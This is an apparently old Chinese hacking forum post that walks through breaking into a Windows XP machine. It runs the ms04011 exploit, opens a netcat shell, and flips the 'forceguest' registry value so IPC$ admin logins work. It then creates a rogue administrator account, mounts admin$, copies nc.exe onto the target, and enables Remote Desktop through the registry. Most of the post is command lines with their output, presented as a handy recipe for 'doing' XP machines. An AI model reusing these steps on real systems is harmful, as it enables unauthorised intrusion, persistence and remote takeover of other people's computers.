XP溢出成功后，如何使用IPC

xp系统对于外来用户即使是admin也当成guest，所以我们用得到对方admin账号密码也无法使用ipc$去连接对方，尽管提示命令成功完成，但依旧没有权限，而使得一些基于ipc$连接的软件也无法使用，这个比较郁闷。

今天xp的本地安全策略中偶然看到一项"网络放问：本地账户的共享和安全模式 仅来宾-本地用户以来宾身份验证"，看一下属性，还有一项"经典-本地用户以自己的身份验证"。眼睛一亮，原来如此，将他改成"经典......"后，试了一下，用另一台机器可以通过ipc$连到xp，和2k一样，哈 ，爽。

于是就想如何能够在提示符下实现，改这些东西，一般就是改的注册表，所以决定从注册表下手，看看注册表有什么变化。找了个工具Resplendent Registrar，监视注册表的，在xp下选"仅来宾-本地用户以来宾身份验证"时开始监视，改成"经典......"后，发现注册表中只有一处发生了变化，[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]下面的"forceguest"的值由1变成了0，问题就在这。改回来宾模式，准备命令行下的测试。上传图片比较麻烦，就用code标签了，我用的是ms04011溢出的，比较老了，但还有很多机器有这个漏洞。用2k对这台xp进行测试

首先D:\>net use \\xpdonaroo\ipc$ 123 /u:test

命令成功完成。

D:\>net use z: \\xpdonaroo\admin$

密码在 \\xpdonaroo\admin$ 无效。

请键入 \\xpdonaroo\admin$ 的密码:

系统发生 5 错误。

拒绝访问。

看到了吧，默认情况下对xp用ipc$不好使 下面溢出

D:\>ms04011 1 192.168.8.222 1122

shellcode size 404

Ret value = 1727

再开一个shell

D:\>nc 192.168.8.222 1122

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

溢出成功，然后修改注册表，也是可以用命令实现的

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd..

cd..

C:\WINDOWS>

C:\WINDOWS>echo Windows Registry Editor Version 5.00>ipc1.reg

echo Windows Registry Editor Version 5.00>ipc1.reg

C:\WINDOWS>echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]>>ipc1.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]>>ipc1.reg

C:\WINDOWS>echo "forceguest"=dword:00000000>>ipc1.reg

echo "forceguest"=dword:00000000>>ipc1.reg

C:\WINDOWS>regedit.exe /S ipc1.reg

regedit.exe /S ipc1.reg

这是写一个reg文件ipc1.reg，然后用regedit.exe /S ipc1.reg导入

下面建个超级用户，都会的，也写上吧

C:\WINDOWS>net user hahaha 123 /add

net user hahaha 123 /add

命令成功完成。

C:\WINDOWS>net localgroup administrators hahaha /add

net localgroup administrators hahaha /add

命令成功完成。

C:\WINDOWS>^C

D:\>net use \\xpdonaroo\ipc$ 123 /u:hahaha

命令成功完成。

D:\>net use z: \\xpdonaroo\admin$

命令成功完成。

看到最后的

C:\WINDOWS>^C

D:\>net use \\xpdonaroo\ipc$ 123 /u:hahaha

命令成功完成。

D:\>net use z: \\xpdonaroo\admin$

命令成功完成。

D:\>z:

Z:\>copy d:\nc.exe z:

已复制 1 个文件。

Z:\>dir nc.exe

驱动器 Z 中的卷没有标签。

卷的序列号是 0000-678A

Z:\ 的目录

1998-01-03 14:37 28,160 nc.exe

1 个文件 28,160 字节

0 个目录 15,185,248,256 可用字节

成功 哈哈哈哈 完全用命令 以后搞xp就方便啦

再补充点：写注册表的地方，如果再写入下边的内容，再用同样的方式导入，可以开xp的3389，2003的也可以。不许要重启，很方便。

c:\echo Windows Registry Editor Version 5.00>>3389.reg

c:\echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

c:\echo "fDenyTSConnections"=dword:00000000>>3389.reg

c:\regedit /s 3389.reg